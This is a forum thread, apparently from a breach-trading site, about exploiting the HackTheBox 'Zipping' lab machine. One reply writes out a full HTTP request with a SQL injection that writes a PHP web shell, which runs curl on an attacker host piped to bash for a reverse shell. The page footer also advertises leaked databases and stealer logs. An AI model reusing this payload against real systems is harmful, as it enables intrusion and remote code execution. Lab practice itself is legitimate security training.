HTB Zipping - Intended User
by randomname188 - Saturday September 9, 2023 at 05:21 AM
#1
pls send credit, i am poor
thank...

here is exploit for instant rev shell:

Spoiler Spoiler

here is info of the exploit:

Spoiler Spoiler
This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: Spamming | Contact us via http://breachddyfwvcp4kzccos5oxtdbssmfbp...on/contact if you feel this is incorrect.
#2
Nice Job! Thank you so much.
#3
Is there any step before the one you describe in your post? The curl that recovers the shell doesn't seem to be executed in my case.

I am using burp, my request looks like this:

GET /shop/index.php?page=product&id=1&%0A\'%3bselect+\'<%3fphp+system(\"curl+http%3a//10.10.14.8/sh.sh|bash\")%3b%3f>\'+into+outfile+\'/var/lib/mysql/breached.php\'+%231 HTTP/1.1
Host: zipping.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
#4
Writeups are here: https://hacktheflag.to/machines/558
Enjoy Smile
#5
The last non-spam response in the topic was more than a month ago. I close the topic as irrelevant to prevent spam. If this is not the case, please send a pm and I will open the topic for discussion again.
See dead links, reposts, or threads without samples in Databases/Other Leaks/Stealer logs? Report it or tag me @Addka72424
New on this forum? Check this thread | TOR
Want to get credits by reposting leaks? Check Earn credits by reposting leaks! | TOR
Want to add your thread to the official section? Check Add to official requests | TOR
Don't know how to use forum Escrow? Check How to use BreachForums escrow | TOR
Looking for verified leaks that haven't been added to the official index yet? Check Unofficial Database Index | TOR

420line


Possibly Related Threads…
Thread Author Replies Views Last Post
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 91 7,569 Yesterday, 07:45 AM
Last Post: ukaugse
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 364 88,805 04-07-2026, 07:41 PM
Last Post: napo22
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 2,359 03-28-2026, 03:30 AM
Last Post: lulaladrow
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 358 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ALL Challenges you Stuck in osamy7593 2 653 03-27-2026, 04:24 PM
Last Post: catsweet



 Users browsing this thread: 1 Guest(s)